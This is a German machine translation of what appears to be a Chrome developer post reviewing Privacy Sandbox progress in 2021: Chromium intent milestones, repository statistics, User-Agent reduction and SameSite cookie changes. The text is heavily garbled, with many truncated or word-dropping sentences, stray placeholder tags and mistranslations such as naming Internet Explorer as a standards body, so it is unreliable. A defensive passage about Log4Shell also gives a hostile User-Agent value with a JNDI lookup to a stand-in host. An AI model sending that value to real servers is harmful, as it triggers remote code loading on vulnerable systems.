Fortschritte bei der Privacy Sandbox (Dezember 2021)

Willkommen bei der Zusammenfassung von Progress in the Privacy für 2021 die Meilensteine in der Entwicklung Drittanbieter-Cookies in Chrome schrittweise einzustellen und auf im privaten Web. Normalerweise bieten wir einen Überblick über Aktualisierungen der Privacy Sandbox sowie Nachrichten aus verschiedenen aber der Dezember war ein ruhiger Monat. Stattdessen schauen wir uns einige der Aktivitäten des Jahres 2021 und nennen Sie einige mögliche Vorsätze, Wir sind im neuen Jahr.

Chromium-Entwicklungsprozess

Damit eine neue Webplattformfunktion in Chromium verfügbar ist, muss sie den offene Entwicklung des Projekts 2021 wurden die Das Privacy Sandbox-Team hat Folgendes entwickelt:

🥚Intention für Prototyp 19
🧪Testabsicht7
🚀Versandabsicht 11
<ph type="x-smartling-placeholder">
</ph> Quelle

Jeder Meilenstein ist auch eine Einladung an die gesamte Webumgebung, einen Beitrag zu leisten.

Ein Intent to Prototype ist der erste Checkpoint, an dem wir zur Diskussion anregen und erste Experimente. Das bedeutet, dass ein Angebot auf GitHub verfügbar sein wird, Hier können Sie eine Frage stellen, indem Sie ein Issue erstellen, oder an Diskussionen teilnehmen und in der Standard- wie das W3C und Internet Explorer. An dieser Stelle beginnt auch das Codieren, das heißt, Sie erwarten, die für Entwicklertests hinter einem Funktion . Das erste Feedback ist entscheidend für die Validierung und Iteration von Angeboten.

Intent to Experiment ist ein optionaler Schritt, wenn Sie eine Ursprungstest. Entwickler können sich für den Ursprung Testversion einer Funktion und testen sie dann in der Produktion. Es wird als Test bezeichnet, weil es bestimmte Aspekte der Funktion gibt, die Sie in realen Umgebungen validieren möchten. Entwickler, die testen und die Ergebnisse dieser Tests teilen, wertvolles Feedback für die Iteration und um die Funktion weiterzuentwickeln.

Der Intent to Ship ist der letzte Meilenstein, der signalisiert, dass das Element vollständig und für die allgemeine Verfügbarkeit bereit. Nach der Genehmigung wird die Funktion in eine neue Version integriert und anschließend die Canary-, Beta- und und stabile Versionen. Es ist wichtig, dass Sie Ihre Websites mit den Canary und Betaversionen von Chrome, um herauszufinden, Fehler melden, bevor eine Funktion stabil ist.

Vorschläge

Zu jedem Privacy Sandbox-Angebot gehört ein zugehöriges GitHub-Repository. A enthält eine Erklärung, um die allgemeine Funktionalität zusammenzufassen, Spezifikation für Browser-Implementierungen und Beiträge aus der in Form von Problemen und Pull-Anfragen.

In 14 Privacy Sandbox-Repositories hatten wir:

💬545Probleme erstellt
250Behobene Probleme
🛠️261Pull-Anfragen erstellt
223Pull-Anfragen zusammengeführt
<ph type="x-smartling-placeholder">
</ph> Quelle

Die Formulierungen in den Erklärungen und in den Spezifikationen sind oft auf eine Zielgruppe ausgerichtet. die bereits mit Standards und der Browserentwicklung vertraut sind, herausfordernd, wenn Sie damit nicht vertraut sind. Das Ziel einer erklärenden Person besteht jedoch darin, erklären! Wenn es Punkte gibt, die unklar oder nicht abgedeckt sind, möchten Sie sich daran erinnern, ein Problem melden, damit wir die Erklärung aktualisieren und klären können.

Auflösungen

User-Agent Frühjahrsputz

Da der Countdown bis zum neuen Jahr abwärts gezählt wird, zählen wir auch nach oben Chrome 100 und die schrittweise Reduzierung des User-Agent-Strings. Dies ist eine gute Motivator dazu, die Verwendung des User-Agent-Strings in Ihrem Code erneut zu überprüfen, um zu prüfen, von einer dieser Änderungen betroffen ist.

So finden Sie diese Bereiche:

  1. Suchen Sie in Ihrem JavaScript-Code nach navigator.userAgent oder greifen Sie auf den User-Agent-Header in Ihrem Servercode.
  2. Überprüfen Sie das Parsen des Strings auf Annahmen für eine zweistellige Version. Für Beispiel: Ein regulärer Ausdruck, der \d\d oder \d{2} angibt, sollte durch \d+
  3. Überprüfen Sie die Verwendung des Strings überall dort, wo Sie auf Folgendes angewiesen sind: <ph type="x-smartling-placeholder">
      </ph>
    • Plattformversion (Betriebssystemversion)
    • vollständige Chrome-Build-Version
    • Name des Mobilgeräts
  4. Dies sind die Werte, die in Zukunft auf feste Strings reduziert werden. Wenn Sie benötigen Zugriff auf diese Werte, migrieren Sie zum User-Agent-Client Hinweise:

Ein Update vom Dezember gibt es zu erwähnen, falls Sie den User-Agent-Client verwenden Hinweise: Wir haben den Intent to Ship gesendet, um das Delegieren von Hinweisen an andere Ursprünge in HTML über ein <meta>-Tag. Beispiel:

<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">

Wenn Sie gerne Frühjahrsputz haben, können Sie auch zur Verwendung von User-Agents. Wenn Sie den String für die Mobilgeräte erkennen und prüfen, ob Sie es durch responsive Design. Informationen zur Funktionsunterstützung von Browsernamen und -versionen findest du unter wenn Sie stattdessen die Feature-Erkennung verwenden können.

Denken Sie immer daran, dass der User-Agent, wie jeder Kunde, -Wert nicht garantiert, dass ihre Genauigkeit oder Bereitstellung sie erfolgt. Die letzten Log4j- Sicherheitslücke, „Log4shell“ liefert ein Beispiel für dieses Risiko. Ein Client, der seinen User-Agent-String auf einen Wert wie ${jndi:ldap://example.com/file} enthalten könnte, kann eine Website um sie aktiv auf dem Server zu parsen.

Eine weitere traditionelle Neujahrsaktivität besteht darin, eine gesunde Anzahl an Keksen mit hochwertigen Zutaten. Im weiteren Verlauf dieses Kurses in Bezug auf die Einstellung von Drittanbieter-Cookies. welche Cookies auf Ihrer Website betroffen sind. 2020 war ein Vorsprung, da sie waren erforderlich, um alle Cookies für websiteübergreifende oder Drittanbieter-Cookies nutzen mit SameSite=None.

Alle Cookies, für die Sie das Attribut SameSite auf None gesetzt haben, benötigen einen aktualisieren.

Derzeit gibt es drei mögliche Vorgehensweisen:

  1. Wenn das Cookie nur in einer 1:1-Beziehung zur Top-Level-Website erforderlich ist, Verfolge dann den Fortschritt der CHIPS Dies bedeutet, dass der Parameter Partitioned-Attribut zum Cookie hinzufügen.
  2. Wenn das Cookie websiteübergreifend, aber nur auf Websites verwendet wird, besitzt und betreiben, dann könnte es für das Erstanbieter- Gruppen. Dazu muss die Websites in der Gruppe und fügen dem Cookie das Attribut SameParty hinzu.
  3. Wenn das Cookie dazu dient, einen gemeinsamen Wert für mehrere sollten Sie sich die umfassendere Privacy Sandbox für eine alternative Lösung vorschlagen, ist websiteübergreifendes Tracking erforderlich.

Wenn du dich besonders gesundheitsbewusst fühlst, ist dies auch ein idealer Zeitpunkt. Ihre Cookie-Nutzung zu überprüfen, da wir ein gutes Rezept zur Verbesserung eigene Cookies zu entwickeln.

Feedback

Wir veröffentlichen diese monatlichen Updates weiter und entwickeln Wir möchten dafür sorgen, dass Entwickler die sie brauchen, um Informationen und die Unterstützung zu erhalten. Gib uns Bescheid auf @ChromiumDev Twitter, wenn es irgendetwas gibt, das wir in dieser Reihe. Ihr Feedback hilft uns dabei, das Format weiter zu verbessern.

Sehen Sie sich die FAQs zur Privacy Sandbox an. basierend auf den Problemen, die Sie an den Entwicklersupport senden, weiter ausweiten Repository. Wenn Sie Fragen zum Testen oder zur Umsetzung der Vorschläge haben, Sprechen Sie mit uns.